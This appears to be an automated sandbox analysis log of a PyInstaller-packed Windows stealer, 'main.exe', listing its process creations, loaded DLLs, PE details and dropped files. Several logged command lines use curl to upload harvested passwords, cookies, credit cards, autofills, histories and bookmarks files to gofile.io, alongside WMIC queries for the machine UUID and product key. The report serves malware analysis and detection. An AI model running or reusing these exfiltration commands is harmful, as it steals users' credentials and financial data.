            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKeyJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: libffi-8.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: libcrypto-3.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: libssl-3.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: pdh.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: sqlite3.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\main.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: main.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: main.exeStatic file information: File size 27577634 > 1048576
            Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: main.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: main.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bossl-modules\legacy.pdb0 source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bossl-modules\legacy.pdb source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: VCRUNTIME140_1.dll.0.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
            Source: libcrypto-3-x64.dll.0.drStatic PE information: section name: .00cfg
            Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
            Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
            Source: legacy.dll.0.drStatic PE information: section name: .00cfg
            Source: mfc140u.dll.0.drStatic PE information: section name: .didat
            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
            Source: python311.dll.0.drStatic PE information: section name: PyRuntim

            Persistence and Installation Behavior

            barindex
            Found pyInstaller with non standard icon
            Source: C:\Users\user\Desktop\main.exeProcess created: "C:\Users\user\Desktop\main.exe"
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\_cffi.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\win32ui.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\libffi-8.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Protocol\_scrypt.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_clmul.pydJump to dropped file
